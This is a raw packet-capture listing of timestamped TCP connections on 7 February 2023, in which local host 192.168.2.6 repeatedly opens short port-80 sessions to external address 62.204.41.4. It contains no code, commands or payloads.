                          Feb 7, 2023 20:03:22.605984926 CET5026080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:22.668237925 CET805026062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:22.670617104 CET805026062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:22.670813084 CET5026080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:23.430162907 CET5026080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:23.430968046 CET5026180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:23.493421078 CET805026062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:23.493468046 CET805026162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:23.493609905 CET5026080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:23.493690014 CET5026180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:23.514341116 CET5026180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:23.576347113 CET805026162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:23.579701900 CET805026162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:23.579873085 CET5026180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:23.743767023 CET5026180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:23.744524002 CET5026280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:23.805027008 CET805026262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:23.805238008 CET5026280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:23.805310965 CET805026162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:23.805382013 CET5026180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:23.849061012 CET5026280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:23.909953117 CET805026262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:23.912177086 CET805026262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:23.912347078 CET5026280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:24.118141890 CET5026280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:24.118917942 CET5026380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:24.178714037 CET805026262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:24.178904057 CET5026280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:24.179316044 CET805026362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:24.179436922 CET5026380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:25.380079985 CET5026380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:25.442532063 CET805026362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:25.446877956 CET805026362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:25.447114944 CET5026380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:25.601485968 CET5026380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:25.602415085 CET5026480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:25.663410902 CET805026362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:25.663602114 CET5026380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:25.664725065 CET805026462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:25.664901972 CET5026480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:25.691638947 CET5026480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:25.754035950 CET805026462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:25.756413937 CET805026462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:25.756510019 CET5026480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:25.878047943 CET5026480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:25.878851891 CET5026580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:25.940385103 CET805026562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:25.940501928 CET805026462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:25.940505981 CET5026580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:25.940563917 CET5026480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:25.941004038 CET5026580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:26.002546072 CET805026562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:26.004627943 CET805026562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:26.004836082 CET5026580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:26.129889965 CET5026580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:26.133748055 CET5026680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:26.191612959 CET805026562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:26.193399906 CET5026580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:26.196341991 CET805026662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:26.196485043 CET5026680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:26.196924925 CET5026680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:26.259737968 CET805026662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:26.263787031 CET805026662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:26.265616894 CET5026680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:26.373786926 CET5026680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:26.374618053 CET5026780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:26.435067892 CET805026762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:26.435328960 CET5026780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:26.436383963 CET805026662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:26.436547995 CET5026680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:26.438066959 CET5026780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:26.498578072 CET805026762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:26.500848055 CET805026762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:26.501000881 CET5026780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:26.610171080 CET5026780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:26.611516953 CET5026880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:26.670824051 CET805026762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:26.672982931 CET5026780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:26.673199892 CET805026862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:26.676999092 CET5026880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:26.680608034 CET5026880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:26.742384911 CET805026862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:26.744736910 CET805026862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:26.744981050 CET5026880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:26.867923021 CET5026880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:26.869019032 CET5026980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:26.931633949 CET805026962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:26.931802034 CET5026980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:26.932435036 CET5026980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:26.932749033 CET805026862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:26.932924986 CET5026880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:26.993021011 CET805026962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:26.995754957 CET805026962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:26.997498035 CET5026980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:27.108411074 CET5026980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:27.109574080 CET5027080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:27.169533014 CET805026962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:27.169672012 CET5026980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:27.170041084 CET805027062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:27.171619892 CET5027080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:27.172190905 CET5027080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:27.232709885 CET805027062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:27.237406015 CET805027062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:27.237561941 CET5027080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:27.358411074 CET5027080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:27.359610081 CET5027180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:27.420592070 CET805027062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:27.420872927 CET5027080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:27.421571016 CET805027162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:27.421761036 CET5027180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:27.422593117 CET5027180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:27.483213902 CET805027162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:27.485740900 CET805027162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:27.485841990 CET5027180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:27.593170881 CET5027180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:27.594326019 CET5027280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:27.653913021 CET805027162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:27.654180050 CET5027180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:27.655076027 CET805027262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:27.655257940 CET5027280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:27.657285929 CET5027280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:27.718132019 CET805027262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:27.720596075 CET805027262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:27.720829964 CET5027280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:27.826931953 CET5027280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:27.827891111 CET5027380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:27.888144016 CET805027262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:27.888322115 CET5027280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:27.890539885 CET805027362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:27.890748978 CET5027380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:27.900257111 CET5027380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:27.963382006 CET805027362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:27.968347073 CET805027362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:27.968594074 CET5027380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:28.077732086 CET5027380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:28.078598022 CET5027480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:28.141093016 CET805027462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:28.141139030 CET805027362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:28.141397953 CET5027380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:28.141401052 CET5027480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:28.142137051 CET5027480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:28.204549074 CET805027462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:28.208792925 CET805027462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:28.208960056 CET5027480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:28.327249050 CET5027480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:28.329360008 CET5027580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:28.389863968 CET805027462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:28.390086889 CET5027480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:28.390899897 CET805027562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:28.391060114 CET5027580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:28.403496027 CET5027580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:28.465519905 CET805027562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:28.467736006 CET805027562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:28.467935085 CET5027580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:28.577869892 CET5027580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:28.578921080 CET5027680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:28.639426947 CET805027562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:28.639620066 CET5027580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:28.641450882 CET805027662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:28.641628027 CET5027680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:28.648273945 CET5027680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:28.710891962 CET805027662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:28.713113070 CET805027662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:28.713304996 CET5027680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:28.828192949 CET5027680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:28.829035044 CET5027780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:28.891123056 CET805027662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:28.891231060 CET5027680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:28.891350031 CET805027762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:28.891448021 CET5027780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:28.892621040 CET5027780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:28.955128908 CET805027762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:28.957741976 CET805027762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:28.957817078 CET5027780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:29.080749989 CET5027780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:29.081614017 CET5027880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:29.143385887 CET805027762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:29.143543959 CET5027780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:29.143968105 CET805027862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:29.144089937 CET5027880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:29.144512892 CET5027880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:29.206964016 CET805027862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:29.212220907 CET805027862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:29.212367058 CET5027880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:29.327040911 CET5027880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:29.327986002 CET5027980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:29.390130997 CET805027962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:29.390312910 CET5027980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:29.390955925 CET5027980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:29.391015053 CET805027862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:29.391109943 CET5027880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:29.453526974 CET805027962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:29.456379890 CET805027962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:29.456533909 CET5027980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:29.567286015 CET5027980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:29.568233013 CET5028080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:29.630247116 CET805027962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:29.630422115 CET5027980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:29.632433891 CET805028062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:29.632596970 CET5028080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:29.633131027 CET5028080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:29.695715904 CET805028062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:29.698019981 CET805028062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:29.698168993 CET5028080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:29.816437960 CET5028080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:29.817574978 CET5028180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:29.879303932 CET805028062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:29.879472017 CET5028080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:29.879995108 CET805028162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:29.880132914 CET5028180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:29.880685091 CET5028180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:29.943115950 CET805028162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:29.945671082 CET805028162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:29.947139025 CET5028180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:30.068608999 CET5028180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:30.069448948 CET5028280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:30.131179094 CET805028262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:30.131448984 CET805028162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:30.131455898 CET5028280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:30.131544113 CET5028180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:30.132021904 CET5028280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:30.193620920 CET805028262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:30.197393894 CET805028262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:30.197663069 CET5028280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:30.313162088 CET5028280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:30.314327002 CET5028380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:30.374809027 CET805028262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:30.375017881 CET5028280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:30.375673056 CET805028362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:30.375803947 CET5028380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:30.376799107 CET5028380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:30.438246012 CET805028362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:30.440956116 CET805028362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:30.441052914 CET5028380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:30.551803112 CET5028380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:30.554718971 CET5028480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:30.613369942 CET805028362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:30.615502119 CET5028380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:30.615534067 CET805028462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:30.615685940 CET5028480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:30.624650955 CET5028480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:30.686382055 CET805028462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:30.689337015 CET805028462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:30.693512917 CET5028480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:30.796847105 CET5028480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:30.797964096 CET5028580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:30.857875109 CET805028462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:30.858105898 CET5028480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:30.858287096 CET805028562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:30.858473063 CET5028580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:30.859757900 CET5028580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:30.920243025 CET805028562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:30.922893047 CET805028562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:30.923162937 CET5028580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:31.032105923 CET5028580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:31.032963037 CET5028680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:31.094536066 CET805028662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:31.094573975 CET805028562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:31.094832897 CET5028580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:31.095391989 CET5028680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:31.095392942 CET5028680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:31.156559944 CET805028662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:31.160752058 CET805028662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:31.165399075 CET5028680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:31.279725075 CET5028680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:31.280787945 CET5028780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:31.339684963 CET805028662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:31.339904070 CET5028680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:31.341325045 CET805028762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:31.341531992 CET5028780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:31.342736959 CET5028780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:31.403250933 CET805028762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:31.406748056 CET805028762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:31.406935930 CET5028780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:31.514054060 CET5028780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:31.515002966 CET5028880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:31.574737072 CET805028762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:31.574846983 CET5028780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:31.576642990 CET805028862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:31.576795101 CET5028880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:31.578001022 CET5028880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:31.639568090 CET805028862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:31.641931057 CET805028862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:31.642119884 CET5028880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:31.749732018 CET5028880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:31.750893116 CET5028980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:31.811659098 CET805028862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:31.811939955 CET5028880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:31.812551022 CET805028962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:31.812685013 CET5028980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:31.813234091 CET5028980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:31.874836922 CET805028962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:31.878911972 CET805028962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:31.879122972 CET5028980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:31.983350992 CET5028980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:31.984359980 CET5029080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:32.044533014 CET805029062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:32.044764996 CET5029080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:32.045902014 CET805028962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:32.046034098 CET5028980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:32.058144093 CET5029080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:32.120970964 CET805029062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:32.123802900 CET805029062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:32.123956919 CET5029080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:32.238240004 CET5029080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:32.239257097 CET5029180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:32.298616886 CET805029062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:32.298715115 CET5029080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:32.299587011 CET805029162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:32.299690008 CET5029180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:32.300203085 CET5029180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:32.360491037 CET805029162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:32.363375902 CET805029162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:32.363531113 CET5029180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:32.496870995 CET5029180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:32.498001099 CET5029280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:32.557465076 CET805029162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:32.557543039 CET5029180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:32.558350086 CET805029262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:32.558464050 CET5029280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:32.559191942 CET5029280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:32.619683981 CET805029262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:32.622472048 CET805029262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:32.622570038 CET5029280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:32.737622976 CET5029280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:32.738866091 CET5029380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:32.798284054 CET805029262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:32.798470974 CET5029280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:32.798527002 CET805029362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:32.798670053 CET5029380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:32.801080942 CET5029380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:32.860737085 CET805029362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:32.864428043 CET805029362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:32.864568949 CET5029380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:33.032526970 CET5029380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:33.033807039 CET5029480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:33.092200994 CET805029362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:33.092310905 CET5029380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:33.095365047 CET805029462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:33.095505953 CET5029480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:33.100244999 CET5029480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:33.161931992 CET805029462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:33.166033983 CET805029462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:33.166143894 CET5029480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:33.286144018 CET5029480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:33.286822081 CET5029580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:33.347769976 CET805029462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:33.348273993 CET805029562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:33.348393917 CET5029480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:33.348536015 CET5029580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:33.354557991 CET5029580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:33.416157961 CET805029562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:33.419173002 CET805029562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:33.419861078 CET5029580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:33.531783104 CET5029580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:33.532809973 CET5029680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:33.593513966 CET805029562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:33.594283104 CET5029580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:33.594428062 CET805029662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:33.594585896 CET5029680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:33.595122099 CET5029680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:33.656575918 CET805029662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:33.658972025 CET805029662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:33.659179926 CET5029680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:33.765506983 CET5029680192.168.2.662.204.41.4
